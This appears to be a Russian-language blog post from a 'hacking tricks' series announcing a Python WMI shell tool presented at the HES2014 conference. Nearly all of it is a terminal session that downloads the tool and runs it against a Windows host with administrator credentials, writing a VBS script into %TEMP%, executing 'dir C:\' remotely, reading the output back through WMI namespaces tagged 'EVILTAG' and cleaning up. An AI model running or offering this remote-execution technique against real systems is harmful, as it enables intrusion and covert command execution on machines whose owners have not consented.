[hacking tricks] Полноценный WMI shell

Усилиями Andrei Dumitrescu появился полноценный WMI шелл на Python. Тула разработана в контексте выступления Andrei's на проходящем сейчас мероприятии #HES2014  [http://2014.hackitoergosum.org/].

Ознакомиться с презентацией можно по следующей ссылке [тынц].

root@bt: ~

root@bt:/tmp# wget https://www.lexsi.fr/conference/wmi-shell.zip
root@bt:/tmp# unzip wmi-shell.zip
Archive:  wmi-shell.zip
   creating: wmi-shell/
  inflating: wmi-shell/LICENSE
  inflating: wmi-shell/wmi-shell.py
  inflating: wmi-shell/README
  inflating: wmi-shell/base.vbs
   creating: wmi-shell/bin/
  inflating: wmi-shell/bin/base64.c
  inflating: wmi-shell/bin/base64.exe
  inflating: wmi-shell/bin/wmis
  inflating: wmi-shell/bin/wmic
   creating: wmi-shell/b64-source/
  inflating: wmi-shell/b64-source/base64.exe
  inflating: wmi-shell/b64-source/base64.c
root@bt:/tmp# cd wmi-shell/
root@bt:/tmp/wmi-shell# python wmi-shell.py administrator password 10.1.37.134
Sending our VBS script to  10.1.37.134  ETA: ~6.4 seconds.
Executed command -->   ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo Function base64_encode( byVal strIn ) >>%TEMP%\E2BpK7z.vbs" 2>/dev/null  <-- . Returned code:  1
...
Executed command -->   ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo End Select >>%TEMP%\E2BpK7z.vbs" 2>/dev/null  <-- . Returned code:  1
>>> dir C:\\
Executed command -->   ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"dir C:\\\"" 2>/dev/null  <-- . Returned code:  1
Executed command -->   ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp  <-- . Returned code:  0
waiting for command output . . Executed command -->   ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp  <-- . Returned code:  0
.  done !
Executed command -->   ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'EVILTAG%'" > bSKFiy5.tmp  <-- . Returned code:  0
Volume in drive C has no label.
 Volume Serial Number is 8E25-9E63

 Directory of C:\

14.07.2009  07:20    <DIR>          PerfLogs
19.04.2014  03:12    <DIR>          Program Files
19.04.2014  22:04    <DIR>          Program Files (x86)
19.04.2014  03:05    <DIR>          Users
20.04.2014  04:19    <DIR          Windows
               0 File(s)              0 bytes
               5 Dir(s)  82▒326▒290▒432 bytes free
Executed command -->   ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"cleanup\"" 2>/dev/null  <-- . Returned code:  1
>>>

Комментариев нет :

Отправить комментарий